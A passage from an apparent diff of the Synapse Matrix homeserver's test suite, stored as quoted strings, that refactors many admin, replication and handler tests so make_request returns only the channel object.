return channel", - "@@ -599,3 +599,3 @@ class PasswordAuthProviderTests(unittest.HomeserverTestCase):", - " \"\"\"Delete an individual device.\"\"\"", - "- _, channel = self.make_request(", - "+ channel = self.make_request(", - " \"DELETE\", \"devices/\" + device, body, access_token=access_token", - "diff --git a/tests/handlers/test_typing.py b/tests/handlers/test_typing.py", - "index f21de958f..96e5bdac4 100644", - "--- a/tests/handlers/test_typing.py", - "+++ b/tests/handlers/test_typing.py", - "@@ -222,3 +222,3 @@ class TypingNotificationsTestCase(unittest.HomeserverTestCase):", - "- (request, channel) = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "diff --git a/tests/handlers/test_user_directory.py b/tests/handlers/test_user_directory.py", - "index 647a17cb9..1260721db 100644", - "--- a/tests/handlers/test_user_directory.py", - "+++ b/tests/handlers/test_user_directory.py", - "@@ -536,3 +536,3 @@ class TestUserDirSearchDisabled(unittest.HomeserverTestCase):", - " # Assert user directory is not empty", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", b\"user_directory/search\", b'{\"search_term\":\"user2\"}'", - "@@ -544,3 +544,3 @@ class TestUserDirSearchDisabled(unittest.HomeserverTestCase):", - " self.config.user_directory_search_enabled = False", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", b\"user_directory/search\", b'{\"search_term\":\"user2\"}'", - "diff --git a/tests/http/test_additional_resource.py b/tests/http/test_additional_resource.py", - "index adc318caa..453391a5a 100644", - "--- a/tests/http/test_additional_resource.py", - "+++ b/tests/http/test_additional_resource.py", - "@@ -48,3 +48,3 @@ class AdditionalResourceTests(HomeserverTestCase):", - "- request, channel = make_request(self.reactor, FakeSite(resource), \"GET\", \"/\")", - "+ channel = make_request(self.reactor, FakeSite(resource), \"GET\", \"/\")", - "@@ -57,3 +57,3 @@ class AdditionalResourceTests(HomeserverTestCase):", - "- request, channel = make_request(self.reactor, FakeSite(resource), \"GET\", \"/\")", - "+ channel = make_request(self.reactor, FakeSite(resource), \"GET\", \"/\")", - "diff --git a/tests/push/test_http.py b/tests/push/test_http.py", - "index 8b4af74c5..cb3245d8c 100644", - "--- a/tests/push/test_http.py", - "+++ b/tests/push/test_http.py", - "@@ -669,3 +669,3 @@ class HTTPPusherTests(HomeserverTestCase):", - " # count goes down", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "diff --git a/tests/replication/test_auth.py b/tests/replication/test_auth.py", - "index aee839dc6..c5ab3032a 100644", - "--- a/tests/replication/test_auth.py", - "+++ b/tests/replication/test_auth.py", - "@@ -49,3 +49,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", - "- def _test_register(self) -> Tuple[SynapseRequest, FakeChannel]:", - "+ def _test_register(self) -> FakeChannel:", - " \"\"\"Run the actual test:", - "@@ -61,3 +61,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", - "- request_1, channel_1 = make_request(", - "+ channel_1 = make_request(", - " self.reactor,", - "@@ -67,3 +67,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", - " {\"username\": \"user\", \"type\": \"m.login.password\", \"password\": \"bar\"},", - "- ) # type: SynapseRequest, FakeChannel", - "+ )", - " self.assertEqual(channel_1.code, 401)", - "@@ -85,3 +85,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", - " \"\"\"", - "- request, channel = self._test_register()", - "+ channel = self._test_register()", - " self.assertEqual(channel.code, 200)", - "@@ -95,3 +95,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", - " \"\"\"", - "- request, channel = self._test_register()", - "+ channel = self._test_register()", - " self.assertEqual(channel.code, 500)", - "@@ -107,3 +107,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", - " \"\"\"", - "- request, channel = self._test_register()", - "+ channel = self._test_register()", - " self.assertEqual(channel.code, 500)", - "@@ -114,3 +114,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", - " \"\"\"", - "- request, channel = self._test_register()", - "+ channel = self._test_register()", - " self.assertEqual(channel.code, 200)", - "diff --git a/tests/replication/test_client_reader_shard.py b/tests/replication/test_client_reader_shard.py", - "index 6cdf6a099..abcc74f93 100644", - "--- a/tests/replication/test_client_reader_shard.py", - "+++ b/tests/replication/test_client_reader_shard.py", - "@@ -43,3 +43,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", - "- request_1, channel_1 = make_request(", - "+ channel_1 = make_request(", - " self.reactor,", - "@@ -49,3 +49,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", - " {\"username\": \"user\", \"type\": \"m.login.password\", \"password\": \"bar\"},", - "- ) # type: SynapseRequest, FakeChannel", - "+ )", - " self.assertEqual(channel_1.code, 401)", - "@@ -56,3 +56,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", - " # also complete the dummy auth", - "- request_2, channel_2 = make_request(", - "+ channel_2 = make_request(", - " self.reactor,", - "@@ -62,3 +62,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", - " {\"auth\": {\"session\": session, \"type\": \"m.login.dummy\"}},", - "- ) # type: SynapseRequest, FakeChannel", - "+ )", - " self.assertEqual(channel_2.code, 200)", - "@@ -75,3 +75,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", - " site_1 = self._hs_to_site[worker_hs_1]", - "- request_1, channel_1 = make_request(", - "+ channel_1 = make_request(", - " self.reactor,", - "@@ -81,3 +81,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", - " {\"username\": \"user\", \"type\": \"m.login.password\", \"password\": \"bar\"},", - "- ) # type: SynapseRequest, FakeChannel", - "+ )", - " self.assertEqual(channel_1.code, 401)", - "@@ -89,3 +89,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", - " site_2 = self._hs_to_site[worker_hs_2]", - "- request_2, channel_2 = make_request(", - "+ channel_2 = make_request(", - " self.reactor,", - "@@ -95,3 +95,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", - " {\"auth\": {\"session\": session, \"type\": \"m.login.dummy\"}},", - "- ) # type: SynapseRequest, FakeChannel", - "+ )", - " self.assertEqual(channel_2.code, 200)", - "diff --git a/tests/replication/test_multi_media_repo.py b/tests/replication/test_multi_media_repo.py", - "index 83afd9fd2..d1feca961 100644", - "--- a/tests/replication/test_multi_media_repo.py", - "+++ b/tests/replication/test_multi_media_repo.py", - "@@ -70,3 +70,3 @@ class MediaRepoShardTestCase(BaseMultiWorkerStreamTestCase):", - " resource = hs.get_media_repository_resource().children[b\"download\"]", - "- _, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "diff --git a/tests/replication/test_sharded_event_persister.py b/tests/replication/test_sharded_event_persister.py", - "index 77fc3856d..8d494ebc0 100644", - "--- a/tests/replication/test_sharded_event_persister.py", - "+++ b/tests/replication/test_sharded_event_persister.py", - "@@ -182,3 +182,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", - " # Do an initial sync so that we're up to date.", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor, sync_hs_site, \"GET\", \"/sync\", access_token=access_token", - "@@ -208,3 +208,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", - " # stream IDs.", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -238,3 +238,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -263,3 +263,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -281,3 +281,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", - " # filtering results based on the vector clock portion.", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -294,3 +294,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", - " # again. This tests that pagination isn't completely broken.", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -309,3 +309,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", - " # Paginating forwards should give the same results", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -320,3 +320,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "diff --git a/tests/rest/admin/test_admin.py b/tests/rest/admin/test_admin.py", - "index 67d887839..0504cd187 100644", - "--- a/tests/rest/admin/test_admin.py", - "+++ b/tests/rest/admin/test_admin.py", - "@@ -44,3 +44,3 @@ class VersionTestCase(unittest.HomeserverTestCase):", - " def test_version_string(self):", - "- request, channel = self.make_request(\"GET\", self.url, shorthand=False)", - "+ channel = self.make_request(\"GET\", self.url, shorthand=False)", - "@@ -70,3 +70,3 @@ class DeleteGroupTestCase(unittest.HomeserverTestCase):", - " # Create a new group", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -86,3 +86,3 @@ class DeleteGroupTestCase(unittest.HomeserverTestCase):", - " url = \"/groups/%s/admin/users/invite/%s\" % (group_id, self.other_user)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", url.encode(\"ascii\"), access_token=self.admin_user_tok, content={}", - "@@ -92,3 +92,3 @@ class DeleteGroupTestCase(unittest.HomeserverTestCase):", - " url = \"/groups/%s/self/accept_invite\" % (group_id,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", url.encode(\"ascii\"), access_token=self.other_user_token, content={}", - "@@ -103,3 +103,3 @@ class DeleteGroupTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/delete_group/\" + group_id", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -125,3 +125,3 @@ class DeleteGroupTestCase(unittest.HomeserverTestCase):", - " url = \"/groups/%s/profile\" % (group_id,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok", - "@@ -136,3 +136,3 @@ class DeleteGroupTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/joined_groups\".encode(\"ascii\"), access_token=access_token", - "@@ -218,3 +218,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", - " \"\"\"Ensure a piece of media is quarantined when trying to access it.\"\"\"", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -243,3 +243,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/media/quarantine/example.org/abcde12345\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", url.encode(\"ascii\"), access_token=non_admin_user_tok,", - "@@ -256,3 +256,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/room/!room%3Aexample.com/media/quarantine\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", url.encode(\"ascii\"), access_token=non_admin_user_tok,", - "@@ -284,3 +284,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", - " # Attempt to access the media", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -301,3 +301,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(\"POST\", url, access_token=admin_user_tok,)", - "+ channel = self.make_request(\"POST\", url, access_token=admin_user_tok,)", - " self.pump(1.0)", - "@@ -353,3 +353,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(\"POST\", url, access_token=admin_user_tok,)", - "+ channel = self.make_request(\"POST\", url, access_token=admin_user_tok,)", - " self.pump(1.0)", - "@@ -397,3 +397,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", url.encode(\"ascii\"), access_token=admin_user_tok,", - "@@ -439,3 +439,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", url.encode(\"ascii\"), access_token=admin_user_tok,", - "@@ -455,3 +455,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", - " # Attempt to access each piece of media", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "diff --git a/tests/rest/admin/test_device.py b/tests/rest/admin/test_device.py", - "index cf3a00759..248c4442c 100644", - "--- a/tests/rest/admin/test_device.py", - "+++ b/tests/rest/admin/test_device.py", - "@@ -52,3 +52,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", - "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", - "@@ -57,3 +57,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"PUT\", self.url, b\"{}\")", - "+ channel = self.make_request(\"PUT\", self.url, b\"{}\")", - "@@ -62,3 +62,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"DELETE\", self.url, b\"{}\")", - "+ channel = self.make_request(\"DELETE\", self.url, b\"{}\")", - "@@ -71,3 +71,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url, access_token=self.other_user_token,", - "@@ -78,3 +78,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", self.url, access_token=self.other_user_token,", - "@@ -85,3 +85,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"DELETE\", self.url, access_token=self.other_user_token,", - "@@ -101,5 +101,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -108,5 +106,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"PUT\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"PUT\", url, access_token=self.admin_user_tok,)", - "@@ -115,5 +111,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"DELETE\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"DELETE\", url, access_token=self.admin_user_tok,)", - "@@ -131,5 +125,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -138,5 +130,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"PUT\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"PUT\", url, access_token=self.admin_user_tok,)", - "@@ -145,5 +135,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"DELETE\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"DELETE\", url, access_token=self.admin_user_tok,)", - "@@ -160,5 +148,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -167,5 +153,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"PUT\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"PUT\", url, access_token=self.admin_user_tok,)", - "@@ -173,5 +157,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"DELETE\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"DELETE\", url, access_token=self.admin_user_tok,)", - "@@ -199,3 +181,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - " body = json.dumps(update)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -210,5 +192,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - " # Ensure the display name was not updated.", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -229,5 +209,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"PUT\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"PUT\", self.url, access_token=self.admin_user_tok,)", - "@@ -236,5 +214,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - " # Ensure the display name was not updated.", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -249,3 +225,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - " body = json.dumps({\"display_name\": \"new displayname\"})", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -259,5 +235,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - " # Check new display_name", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -270,5 +244,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -293,3 +265,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", - " # Delete device", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"DELETE\", self.url, access_token=self.admin_user_tok,", - "@@ -325,3 +297,3 @@ class DevicesRestTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", - "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", - "@@ -336,5 +308,3 @@ class DevicesRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=other_user_token,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=other_user_token,)", - "@@ -348,5 +318,3 @@ class DevicesRestTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v2/users/@unknown_person:test/devices\"", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -361,5 +329,3 @@ class DevicesRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -375,5 +341,3 @@ class DevicesRestTestCase(unittest.HomeserverTestCase):", - " # Get devices", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -393,5 +357,3 @@ class DevicesRestTestCase(unittest.HomeserverTestCase):", - " # Get devices", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -433,3 +395,3 @@ class DeleteDevicesRestTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"POST\", self.url, b\"{}\")", - "+ channel = self.make_request(\"POST\", self.url, b\"{}\")", - "@@ -444,5 +406,3 @@ class DeleteDevicesRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"POST\", self.url, access_token=other_user_token,", - "- )", - "+ channel = self.make_request(\"POST\", self.url, access_token=other_user_token,)", - "@@ -456,5 +416,3 @@ class DeleteDevicesRestTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v2/users/@unknown_person:test/delete_devices\"", - "- request, channel = self.make_request(", - "- \"POST\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"POST\", url, access_token=self.admin_user_tok,)", - "@@ -469,5 +427,3 @@ class DeleteDevicesRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"POST\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"POST\", url, access_token=self.admin_user_tok,)", - "@@ -481,3 +437,3 @@ class DeleteDevicesRestTestCase(unittest.HomeserverTestCase):", - " body = json.dumps({\"devices\": [\"unknown_device1\", \"unknown_device2\"]})", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -512,3 +468,3 @@ class DeleteDevicesRestTestCase(unittest.HomeserverTestCase):", - " body = json.dumps({\"devices\": device_ids})", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "diff --git a/tests/rest/admin/test_event_reports.py b/tests/rest/admin/test_event_reports.py", - "index 11b72c10f..aa389df12 100644", - "--- a/tests/rest/admin/test_event_reports.py", - "+++ b/tests/rest/admin/test_event_reports.py", - "@@ -76,3 +76,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", - "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", - "@@ -86,5 +86,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.other_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.other_user_tok,)", - "@@ -98,5 +96,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -113,3 +109,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=5\", access_token=self.admin_user_tok,", - "@@ -128,3 +124,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?from=5\", access_token=self.admin_user_tok,", - "@@ -143,3 +139,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?from=5&limit=10\", access_token=self.admin_user_tok,", - "@@ -158,3 +154,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -178,3 +174,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -198,3 +194,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -220,3 +216,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - " # fetch the most recent first, largest timestamp", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?dir=b\", access_token=self.admin_user_tok,", - "@@ -236,3 +232,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - " # fetch the oldest first, smallest timestamp", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?dir=f\", access_token=self.admin_user_tok,", - "@@ -256,3 +252,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?dir=bar\", access_token=self.admin_user_tok,", - "@@ -269,3 +265,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=-5\", access_token=self.admin_user_tok,", - "@@ -281,3 +277,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?from=-5\", access_token=self.admin_user_tok,", - "@@ -295,3 +291,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - " # Number of results is the number of entries", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=20\", access_token=self.admin_user_tok,", - "@@ -306,3 +302,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - " # Number of max results is larger than the number of entries", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=21\", access_token=self.admin_user_tok,", - "@@ -317,3 +313,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - " # Number of max results is smaller than the number of entries", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=19\", access_token=self.admin_user_tok,", - "@@ -329,3 +325,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - " # `next_token` does not appear", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?from=19\", access_token=self.admin_user_tok,", - "@@ -344,3 +340,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -401,3 +397,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", - "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", - "@@ -411,5 +407,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.other_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.other_user_tok,)", - "@@ -423,5 +417,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -436,3 +428,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", - " # `report_id` is negative", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -450,3 +442,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", - " # `report_id` is a non-numerical string", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -464,3 +456,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", - " # `report_id` is undefined", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -482,3 +474,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -498,3 +490,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "diff --git a/tests/rest/admin/test_media.py b/tests/rest/admin/test_media.py", - "index dadf9db66..c2b998cda 100644", - "--- a/tests/rest/admin/test_media.py", - "+++ b/tests/rest/admin/test_media.py", - "@@ -52,3 +52,3 @@ class DeleteMediaByIDTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"DELETE\", url, b\"{}\")", - "+ channel = self.make_request(\"DELETE\", url, b\"{}\")", - "@@ -66,5 +66,3 @@ class DeleteMediaByIDTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"DELETE\", url, access_token=self.other_user_token,", - "- )", - "+ channel = self.make_request(\"DELETE\", url, access_token=self.other_user_token,)", - "@@ -79,5 +77,3 @@ class DeleteMediaByIDTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"DELETE\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"DELETE\", url, access_token=self.admin_user_tok,)", - "@@ -92,5 +88,3 @@ class DeleteMediaByIDTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"DELETE\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"DELETE\", url, access_token=self.admin_user_tok,)", - "@@ -123,3 +117,3 @@ class DeleteMediaByIDTestCase(unittest.HomeserverTestCase):", - " # Attempt to access media", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -148,5 +142,3 @@ class DeleteMediaByIDTestCase(unittest.HomeserverTestCase):", - " # Delete media", - "- request, channel = self.make_request(", - "- \"DELETE\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"DELETE\", url, access_token=self.admin_user_tok,)", - "@@ -159,3 +151,3 @@ class DeleteMediaByIDTestCase(unittest.HomeserverTestCase):", - " # Attempt to access media", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -206,3 